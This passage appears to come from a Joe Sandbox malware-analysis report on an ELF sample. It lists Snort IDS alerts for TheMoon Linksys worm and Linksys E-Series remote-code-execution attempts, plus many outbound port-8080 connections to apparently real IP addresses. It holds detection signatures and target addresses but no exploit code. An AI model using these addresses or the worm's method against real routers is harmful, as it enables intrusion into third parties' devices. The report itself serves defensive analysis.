              Timestamp:192.168.2.23104.206.34.2374960080802026102 12/21/23-18:41:17.810451
              SID:2026102
              Source Port:49600
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.172.33.1943932280802018132 12/21/23-18:41:31.514403
              SID:2018132
              Source Port:39322
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2373.171.251.1233788480802027153 12/21/23-18:41:45.423583
              SID:2027153
              Source Port:37884
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.70.52.2374833880802026102 12/21/23-18:40:59.797048
              SID:2026102
              Source Port:48338
              Destination Port:8080
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: ZhhHfkNewm.elfAvira: detected

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44956 -> 198.41.207.56:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44956 -> 198.41.207.56:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:44956 -> 198.41.207.56:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35910 -> 82.47.115.8:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35910 -> 82.47.115.8:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35910 -> 82.47.115.8:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48338 -> 146.70.52.237:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48338 -> 146.70.52.237:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48338 -> 146.70.52.237:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56684 -> 45.55.196.121:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56684 -> 45.55.196.121:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56684 -> 45.55.196.121:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46498 -> 211.250.133.42:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46498 -> 211.250.133.42:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:46498 -> 211.250.133.42:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52896 -> 195.114.111.83:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52896 -> 195.114.111.83:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52896 -> 195.114.111.83:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55028 -> 203.234.50.155:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55028 -> 203.234.50.155:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55028 -> 203.234.50.155:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60308 -> 118.82.125.228:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60308 -> 118.82.125.228:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60308 -> 118.82.125.228:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55062 -> 115.74.135.254:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55062 -> 115.74.135.254:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55062 -> 115.74.135.254:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59896 -> 212.21.157.90:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59896 -> 212.21.157.90:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:59896 -> 212.21.157.90:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48650 -> 182.172.28.37:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48650 -> 182.172.28.37:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48650 -> 182.172.28.37:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49600 -> 104.206.34.237:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49600 -> 104.206.34.237:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49600 -> 104.206.34.237:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35060 -> 69.87.220.246:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35060 -> 69.87.220.246:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35060 -> 69.87.220.246:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42862 -> 118.58.31.78:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42862 -> 118.58.31.78:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42862 -> 118.58.31.78:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35020 -> 180.81.166.121:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35020 -> 180.81.166.121:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35020 -> 180.81.166.121:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49912 -> 96.238.85.27:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49912 -> 96.238.85.27:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49912 -> 96.238.85.27:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:51364 -> 104.24.24.135:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51364 -> 104.24.24.135:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:51364 -> 104.24.24.135:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42974 -> 78.108.218.75:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42974 -> 78.108.218.75:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42974 -> 78.108.218.75:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36836 -> 118.36.207.147:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36836 -> 118.36.207.147:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36836 -> 118.36.207.147:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55344 -> 146.148.249.114:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55344 -> 146.148.249.114:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55344 -> 146.148.249.114:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36670 -> 162.186.4.131:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36670 -> 162.186.4.131:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36670 -> 162.186.4.131:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39322 -> 185.172.33.194:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39322 -> 185.172.33.194:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39322 -> 185.172.33.194:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39232 -> 87.237.122.61:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39232 -> 87.237.122.61:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39232 -> 87.237.122.61:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55420 -> 118.62.235.14:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55420 -> 118.62.235.14:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55420 -> 118.62.235.14:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43294 -> 109.247.109.52:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43294 -> 109.247.109.52:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43294 -> 109.247.109.52:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42060 -> 84.231.177.107:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42060 -> 84.231.177.107:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42060 -> 84.231.177.107:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55956 -> 80.152.249.78:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55956 -> 80.152.249.78:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55956 -> 80.152.249.78:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37884 -> 73.171.251.123:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37884 -> 73.171.251.123:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:37884 -> 73.171.251.123:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33630 -> 156.96.234.189:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33630 -> 156.96.234.189:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:33630 -> 156.96.234.189:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:51032 -> 177.191.56.11:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51032 -> 177.191.56.11:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:51032 -> 177.191.56.11:8080
              Source: TrafficSnort IDS: 2842117 ETPRO WORM ELF/TheMoon.Linksys Worm Activity (Outbound) 192.168.2.23:36542 -> 104.24.78.255:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36542 -> 104.24.78.255:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36542 -> 104.24.78.255:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36542 -> 104.24.78.255:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34696 -> 20.157.191.178:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34696 -> 20.157.191.178:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34696 -> 20.157.191.178:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47570 -> 34.149.195.93:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47570 -> 34.149.195.93:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:47570 -> 34.149.195.93:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54116 -> 172.65.82.250:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54116 -> 172.65.82.250:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54116 -> 172.65.82.250:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38752 -> 14.74.41.139:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38752 -> 14.74.41.139:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:38752 -> 14.74.41.139:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53646 -> 96.228.36.80:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53646 -> 96.228.36.80:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:53646 -> 96.228.36.80:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35400 -> 96.3.116.23:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35400 -> 96.3.116.23:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35400 -> 96.3.116.23:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43740 -> 194.62.214.204:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43740 -> 194.62.214.204:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43740 -> 194.62.214.204:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55396 -> 166.253.31.110:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55396 -> 166.253.31.110:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:55396 -> 166.253.31.110:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53838 -> 104.16.197.26:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53838 -> 104.16.197.26:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:53838 -> 104.16.197.26:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57676 -> 185.36.54.3:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57676 -> 185.36.54.3:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:57676 -> 185.36.54.3:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49678 -> 154.9.60.52:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49678 -> 154.9.60.52:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49678 -> 154.9.60.52:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:58046 -> 91.228.46.89:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58046 -> 91.228.46.89:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:58046 -> 91.228.46.89:8080
              Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40944 -> 13.229.49.197:8080
              Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40944 -> 13.229.49.197:8080
              Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:40944 -> 13.229.49.197:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 194.144.128.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 189.249.180.181:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 223.208.6.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 218.136.192.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 143.127.39.32:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 110.206.83.213:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 70.31.66.242:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 86.112.197.248:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 165.98.148.254:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 45.170.112.249:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.53.175.109:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 159.158.6.156:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 86.135.57.150:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 161.90.103.6:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 5.62.71.144:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 123.253.170.149:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 212.238.166.171:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 212.182.187.4:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 176.237.230.212:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 109.231.126.39:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 101.110.166.223:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 169.252.152.123:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 119.153.237.2:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 105.47.250.124:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 18.46.148.92:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 79.114.65.159:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 182.33.46.247:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 219.201.21.169:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 187.136.119.41:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.139.109.131:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 97.146.139.242:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 164.151.74.166:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 136.241.99.229:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 125.221.60.23:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 99.168.204.13:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 8.177.244.213:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 142.245.183.133:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 53.78.13.6:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 9.172.129.73:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 5.13.229.40:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 4.63.234.116:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 31.74.172.80:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.185.192.157:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.78.94.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 75.184.54.227:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 62.142.56.6:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 72.80.95.36:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 51.219.97.40:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 212.230.117.179:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 64.53.14.124:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 68.119.168.46:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 186.2.74.106:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 155.208.143.7:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.72.185.210:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 57.8.27.197:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 40.205.209.221:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 18.206.143.44:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 113.151.54.203:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 218.145.167.35:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 185.220.141.52:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 36.8.40.158:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 199.176.226.156:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 137.235.141.180:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 83.58.18.85:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 194.163.139.49:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 118.81.199.95:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 147.148.22.185:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 150.215.78.184:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 204.110.32.35:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 159.180.127.229:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 37.6.41.190:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.58.206.44:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 113.145.64.170:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 24.26.193.45:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 166.110.144.127:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 164.251.180.85:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 71.76.17.164:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 154.113.87.47:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 86.155.215.72:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 198.74.233.24:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 213.21.164.238:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 54.88.137.167:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 5.173.153.64:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 41.222.200.75:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 145.237.108.247:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 219.7.21.29:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 157.241.185.181:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 90.131.152.166:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 80.225.153.232:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 107.249.227.137:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 155.97.7.237:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 147.53.82.107:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 47.43.29.171:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 123.27.114.201:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 173.72.120.242:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 60.189.172.218:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 24.35.14.42:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 188.191.113.88:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 1.139.163.238:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 163.108.113.245:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 203.7.101.127:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 115.64.235.239:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 143.54.143.195:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 188.122.69.74:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 175.248.83.42:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 166.252.161.118:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 167.104.26.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 171.214.72.88:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 88.26.200.68:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 63.11.179.209:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 211.30.37.82:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 169.219.214.143:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 167.184.245.39:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 119.215.127.13:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 134.77.87.31:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 81.20.177.70:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 92.218.80.233:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 19.123.116.147:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 2.234.87.146:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 77.166.248.182:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 57.147.184.18:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 117.113.136.58:8080
              Source: global trafficTCP traffic: 192.168.2.23:55303 -> 132.171.254.45:8080
